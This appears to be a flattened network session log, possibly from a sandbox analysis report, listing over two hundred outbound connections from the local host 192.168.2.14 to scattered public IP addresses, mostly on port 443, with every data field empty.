                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22407192.168.2.1436962144.202.185.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22408192.168.2.145188832.220.44.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22409192.168.2.1448790174.249.248.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22410192.168.2.144620099.138.72.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22411192.168.2.143853067.81.211.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22412192.168.2.1460584185.97.144.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22413192.168.2.1439630186.110.60.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22414192.168.2.144317887.9.254.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22415192.168.2.143517877.32.83.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22416192.168.2.1447984100.243.247.207443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22417192.168.2.145411049.52.251.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22418192.168.2.144508427.175.151.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22419192.168.2.1455482158.165.121.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22420192.168.2.1446468145.12.234.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22421192.168.2.144099013.209.103.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22422192.168.2.1448966111.252.239.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22423192.168.2.144742851.74.62.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22424192.168.2.144386451.228.238.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22425192.168.2.1456064200.135.33.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22426192.168.2.145241270.8.208.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22427192.168.2.1454734179.128.134.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22428192.168.2.144836449.236.123.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22429192.168.2.1447326114.137.113.44443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22430192.168.2.143309834.116.58.224443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22431192.168.2.145015445.164.135.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22432192.168.2.1439800176.216.198.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22433192.168.2.144768299.67.49.80443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22434192.168.2.1433672104.94.220.107443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22435192.168.2.145533883.182.240.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22436192.168.2.1460752111.227.94.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22437192.168.2.145954090.16.210.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22438192.168.2.1442748175.4.115.125443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22439192.168.2.143859637.77.19.61443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22440192.168.2.1441030137.160.213.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22441192.168.2.143297645.101.104.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22442192.168.2.1437308157.15.166.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22443192.168.2.144693057.225.127.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22444192.168.2.1453394223.156.135.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22445192.168.2.1454834112.174.30.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22446192.168.2.144665866.115.192.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22447192.168.2.144418064.106.222.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22448192.168.2.145798474.14.200.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22449192.168.2.143314281.28.136.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22450192.168.2.14504802.172.255.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22451192.168.2.1460024114.241.239.142443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22452192.168.2.1455126131.143.158.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22453192.168.2.1456440138.163.97.148443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22454192.168.2.143344252.50.43.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22455192.168.2.145375241.98.22.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22456192.168.2.143473859.132.103.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22457192.168.2.143628437.107.15.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22458192.168.2.1455410111.67.217.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22459192.168.2.145012232.156.55.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22460192.168.2.143890662.184.170.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22461192.168.2.1433798217.20.220.44443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22462192.168.2.1448898136.237.128.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22463192.168.2.1446750116.204.183.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22464192.168.2.1460754171.198.36.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22465192.168.2.1447252213.255.135.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22466192.168.2.1455300154.238.66.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22467192.168.2.144032694.217.182.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22468192.168.2.143636227.243.178.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22469192.168.2.1434072208.246.246.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22470192.168.2.145123665.132.78.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22471192.168.2.1458324188.2.171.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22472192.168.2.1440756140.166.29.30443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22473192.168.2.143853494.254.136.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22474192.168.2.145012253.20.152.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22475192.168.2.145411432.61.242.89443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22476192.168.2.1445308178.174.215.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22477192.168.2.1456370201.174.139.89443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22478192.168.2.1445384150.23.170.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22479192.168.2.1449240105.98.36.89443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22480192.168.2.1453060167.146.143.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22481192.168.2.1459500105.172.132.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22482192.168.2.1441016194.141.122.220443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22483192.168.2.1434506103.135.219.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22484192.168.2.1444418212.126.101.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22485192.168.2.1444184141.41.239.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22486192.168.2.144600041.94.51.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22487192.168.2.1458150203.110.253.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22488192.168.2.145510873.113.15.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22489192.168.2.14607944.13.227.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22490192.168.2.14381901.141.70.101443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22491192.168.2.145085260.170.203.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22492192.168.2.1442660201.226.26.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22493192.168.2.1442496101.176.225.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22494192.168.2.143981051.157.220.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22495192.168.2.144414423.31.163.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22496192.168.2.145703073.131.243.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22497192.168.2.144699242.229.161.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22498192.168.2.144952083.189.40.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22499192.168.2.1445684185.241.240.89443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22500192.168.2.1437278125.20.73.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22501192.168.2.14362628.232.169.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22502192.168.2.1444048195.166.127.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22503192.168.2.1445610108.66.76.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22504192.168.2.1441978206.189.164.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22505192.168.2.145044891.100.157.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22506192.168.2.1445116207.133.62.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22507192.168.2.144566243.85.138.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22508192.168.2.1439250101.164.75.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22509192.168.2.145067295.232.122.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22510192.168.2.1445666149.27.212.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22511192.168.2.1454118206.178.236.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22512192.168.2.145565266.114.105.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22513192.168.2.144632658.217.199.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22514192.168.2.143383863.211.163.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22515192.168.2.145413699.239.225.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22516192.168.2.144426269.131.190.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22517192.168.2.1452054117.188.163.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22518192.168.2.1442522168.91.185.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22519192.168.2.144307689.184.93.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22520192.168.2.144584035.177.8.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22521192.168.2.144124286.24.226.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22522192.168.2.144127449.28.43.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22523192.168.2.1454536119.220.38.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22524192.168.2.1458964113.180.66.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22525192.168.2.1436750194.167.182.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22526192.168.2.145872040.35.45.110443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22527192.168.2.1449212212.39.161.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22528192.168.2.144720895.212.40.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22529192.168.2.144338446.72.107.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22530192.168.2.1432822185.11.212.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22531192.168.2.14439282.195.164.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22532192.168.2.1435806164.221.129.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22533192.168.2.145187694.105.101.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22534192.168.2.1449272124.105.192.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22535192.168.2.1443374145.169.36.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22536192.168.2.1455346169.206.40.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22537192.168.2.143504631.252.8.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22538192.168.2.1455198121.191.6.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22539192.168.2.1444274172.237.30.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22540192.168.2.1437214137.59.26.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22541192.168.2.144492237.75.39.245443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22542192.168.2.1444468157.8.253.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22543192.168.2.1458112169.224.50.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22544192.168.2.145804294.104.27.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22545192.168.2.145271095.157.158.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22546192.168.2.1459470135.144.174.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22547192.168.2.1439766110.128.210.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22548192.168.2.1438856203.211.114.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22549192.168.2.143700496.109.109.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22550192.168.2.1457540118.185.125.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22551192.168.2.144867487.198.79.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22552192.168.2.145685094.123.143.2118080
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22553192.168.2.1455578130.231.91.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22554192.168.2.143769298.254.214.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22555192.168.2.1437758217.104.35.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22556192.168.2.143852425.106.85.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22557192.168.2.1438390166.76.81.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22558192.168.2.1450604164.98.30.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22559192.168.2.1444218175.190.206.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22560192.168.2.146063249.155.156.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22561192.168.2.143449071.67.254.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22562192.168.2.145445864.125.217.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22563192.168.2.143840634.31.191.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22564192.168.2.1446670191.229.223.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22565192.168.2.1443256107.58.240.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22566192.168.2.143600249.108.160.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22567192.168.2.1433174178.41.116.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22568192.168.2.1434286131.136.82.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22569192.168.2.1458986173.119.151.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22570192.168.2.1454254141.75.5.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22571192.168.2.143536071.23.195.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22572192.168.2.1443988159.21.95.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22573192.168.2.1453790212.252.224.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22574192.168.2.1460218143.57.237.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22575192.168.2.144873681.242.142.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22576192.168.2.14410645.81.159.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22577192.168.2.1440064196.229.50.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22578192.168.2.1459488175.5.17.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22579192.168.2.1439948114.219.142.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22580192.168.2.1457738144.213.169.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22581192.168.2.1449670153.214.140.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22582192.168.2.1449194114.50.66.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22583192.168.2.1453064103.145.98.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22584192.168.2.146069090.154.195.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22585192.168.2.143888843.193.1.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22586192.168.2.1433256144.188.131.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22587192.168.2.144721817.185.47.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22588192.168.2.143576047.236.151.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22589192.168.2.145105859.244.155.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22590192.168.2.143445697.1.93.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22591192.168.2.1448906179.246.167.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22592192.168.2.1443818166.39.141.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22593192.168.2.1451688125.107.253.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22594192.168.2.1453414106.191.83.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22595192.168.2.1444766146.213.69.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22596192.168.2.1449726141.216.216.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22597192.168.2.1452482115.147.166.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22598192.168.2.14534701.109.68.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22599192.168.2.1445192186.106.123.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22600192.168.2.1450400223.10.98.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22601192.168.2.144426847.150.164.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22602192.168.2.1457258121.149.183.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22603192.168.2.143698446.60.107.89443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22604192.168.2.1444536136.161.73.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22605192.168.2.1437670204.220.203.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22606192.168.2.143403886.71.243.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22607192.168.2.1456404154.171.76.217443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22608192.168.2.144809827.132.244.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22609192.168.2.145695088.124.139.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22610192.168.2.1433928118.37.61.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22611192.168.2.143896486.44.0.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22612192.168.2.145106484.88.123.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22613192.168.2.1438698101.107.246.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22614192.168.2.1438188216.94.98.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22615192.168.2.1447300103.140.151.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22616192.168.2.14539489.47.16.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22617192.168.2.1442920212.251.56.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22618192.168.2.143807651.239.233.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22619192.168.2.1448290108.191.36.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22620192.168.2.1459480203.103.89.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22621192.168.2.1434778201.194.61.222443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22622192.168.2.1446168204.188.242.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22623192.168.2.145018065.124.60.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22624192.168.2.1460302145.235.149.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22625192.168.2.1438134188.177.229.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22626192.168.2.144799094.124.22.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22627192.168.2.143938413.255.241.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22628192.168.2.1457990158.61.136.60443
                                              TimestampBytes transferredDirectionData


